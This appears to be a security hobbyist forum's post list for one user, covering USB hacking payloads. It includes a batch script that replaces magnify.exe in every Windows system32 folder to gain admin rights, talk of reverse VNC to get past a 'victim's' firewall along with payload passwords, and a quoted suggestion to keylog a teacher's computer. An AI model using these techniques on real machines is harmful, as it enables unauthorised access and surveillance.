Jump to content

GonZor

Active Members
  • Posts

    352
  • Joined

  • Last visited

Posts posted by GonZor

  1. If you are going to ask for something like code for a program and not share it with the community, PM the user in question and keep it to yourself, but do not ask for help and then give a big middle finger to the rest of the users who have tried to help you. USBHacker should change his/her name to USBHackerWannabeExtraordinaire. And it's not Duke of USBHackers! it's DickOfUsbHackers! because your such a winy little pric.

    QFE

  2. Don't know how :(

    If someone gives me it, I can add features though!

    I have several questions...

    1. Do you know what go.exe does?

    1(a) If no why are you running executables when you don't know what they do?

    1(b) If yes how can you add features if you don't know how to write your own?

    2. Why is this "URGENT!"?

    3. Have you tried google?

    3(a) If no why not? you say this is urgent and using google is generally quite quick.

  3. no problem :)

    I tried my "1337-get-admin-rights-prog" at several computers and i realized a problem:

    it doesn't work properly if there are more than one installed win nt system o the computer because my program checks out every drive by doing a "if exist" query, so the last drive is the used one.

    Does anyone know an automated workaround?

    @echo on
    FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
        IF EXIST %i:ntldr (
            SET SYS=%i
            FOR %a IN (windows winnt) DO (
                IF EXIST %sys%:%asystem32winlogon.exe (
                    SET WIN=%a
                    copy ".magnify.exe" "%SYS%:%win%system32dllcachemagnify.exe" /Y
                    copy ".magnify.exe" "%SYS%:%win%system32magnify.exe" /Y
                )
            )
        )
    )

    Could try that, You could also rewrite it to make it look better but that should work to copy it over to every existence of windows on every drive.

  4. I'm having a problem with this - I DID read thru the board, but the issue that I'm having is after now I can't even access my flash drive or the u3 partition after running the customizer executable. .  If anyone can help me with this - that would be great!  My drive no longer seems to work at all. .  It's sitting here all lit up and whatnot.  Hellp!!    :-?

    By saying it no longer works, do you mean the drives aren't mapped (can computer management see the drives)? Did an error occur while flashing the drive? Have you tried this on any other computers?

  5. if they're stealing flash drives, they must be some sort of geek that could think of this. best of luck though.

    Don't be so sure, most of the people I know that have stolen a flash drive are quite the opposite. I was actually asked a question once by one of these people "why did they create two internets?" he was referring to Internet Explorer and Firefox, he believed they were 2 different internet's.

  6. A possibility to get around firewalls would be to have the victim's computer some how join a VPN.  I'm not sure how easy this would be, but I'm pretty sure its possible.  A silent install of a VPN client maybe very hard/time consuming.  Just a thought... 

    So far the best way to get around someones firewall is reverse vnc as suggested by someone in the payload release thread. Not too difficult to modify.

  7. I have figured out that it is not only emails from Hak5.org but all emails that get sent to this account are detected as a virus, when I disable pop3 scanning NOD32 and Avast don't detect any virus's. I originally thought it was only emails from Hak5 (thats basically all I get from that account) but it seems all my emails are being detected as false positives. Has anyone heard of this problem before? This email account is with my ISP so I'm assuming it has something to do with them or the way the emails are received from them.

  8. ^Autorun.inf?

    &

    Command Prompt's?

    That still requires social engineering because removable media doesn't autorun.

    @digip to the best of my knowledge no one has found a way to make a non U3 drive autorun (on a full patched machine).

  9. every time i use vncviewer, type in the external ip of the victim comp, it just comes back as "failed to connect to server".

    There are several things that could be causing this, like the victims firewall/router. We are currently working on ways around this but it our main concern at the moment is getting the new site up and functional.The port is set automatically in the reg file. Also the password may be in question, I have gotten several results back saying different passwords work for different people these are (hacked, yougothacked, easy) you may have to try all three to see which works for you.

  10. it annoys me too when people are like

    ZOMG lets cheat on tests in school!

    If you need to cheat go play monopoly, its easy to cheat when your the bank. I hate people that cheat in test's it's annoying, I earn't all my grades at school (although for me its easy to get +90% on a test) and when people cheated it was just irritating. On the other hand, in monopoly I have no problem cheating :P

  11. I've never come across any command-line keyloggers, so my advice is to code one yourself if you can, and if not, I'm sure someone on this site could do it for you if you asked nicely :)

    As far as the practicality of a keylogger, they can be very useful. For instance, if you're a student and there's a test coming up and you want the answers to "study" with, you could install an invisible keylogger on the teacher's computer :) (or probably just use the HackSaw)

    Well you answered it yourself, but still that is not a legitimate use for a key logger.

  12. At the time, it was a means to an end, and this was like 7, 8 years ago and one of my first VB apps at the time.

    In my opinion it's still not a legitimate use, but an acceptable solution to an annoying problem.

    IF anything, he whould learn to write his own. That in itself was more rewarding the actually using it and he would learn something in the process.

    QFE

  13. Imagine sending a pop to the user that tells him or her their Lat and Long coordinates and warns them to mail the device to a certain address or be arrested within the next few hours. I bet you would shit a brick, even if it wasn't true, if a fake message like that might get your device returned if all it did was pop that up on insertion. It doesn't even have to be their real coordinates (although they might actually check). You would probably have a pretty good return percentage. Make an official government like type of image and disclaimer along with the pop up to make it look more authentic. Might scare some people into actually mailing it to you.

    Sounds like a good idea :P

    At my old school the people that would be the ones to steal the USB drives wouldn't be smart enough to check, they would believe it but they would more likely bin the drive rather than mail it back. and so you would once again be without a drive.

  14. Hmm not 100% true, if u have a family, and young kids, and want to be on the safeside, a keylogger is fine, but u really should atleast tell the kids, u will monitor the, at all times on the PC.

    There is if it's your pc. My sister used to get on AOL using my pc and I told her I didn't want her on there. I eventually got her password and changed it so she couldnt use her account anymore. I gave it back to her after she agreed to stop messing with my pc. (This was before xp, so there was no password to lock the pc down per accounts on 98). I had written it in VB and it saved ANY typed words from any keystroks along with the title of any program you may have been in to a log file.

    "Look at the sky just before you die" - isn't that Metallica?

    Ok I can see a legitimate use for a key logger if you only own a node on your network but I control everything on my network and therefore can accomplish both of these without the need for a keylogger. But yes I have also written a key logger in VB, wasn't the greatest but it worked.

    I also wouldn't say that stealing your sister AOL password is a legitimate use for a keylogger.

  15. i've created the ultimate usb drive (Cyclone)

    I've heard that way too many times...

    and after it has run its course it deletes itself completely. . . 

    no information is stored on the local computer. . .  everyhting is

    uploaded or e-mailed to a rremote location

    I hope you mean *SECURELY DELETES* else you will leave a trace, are the logs emailed directly or do you put them in a textfile and email that ?

    I like the idea but hate it at the same time, all I know is there is no way it will work on my windows box :P

×
×
  • Create New...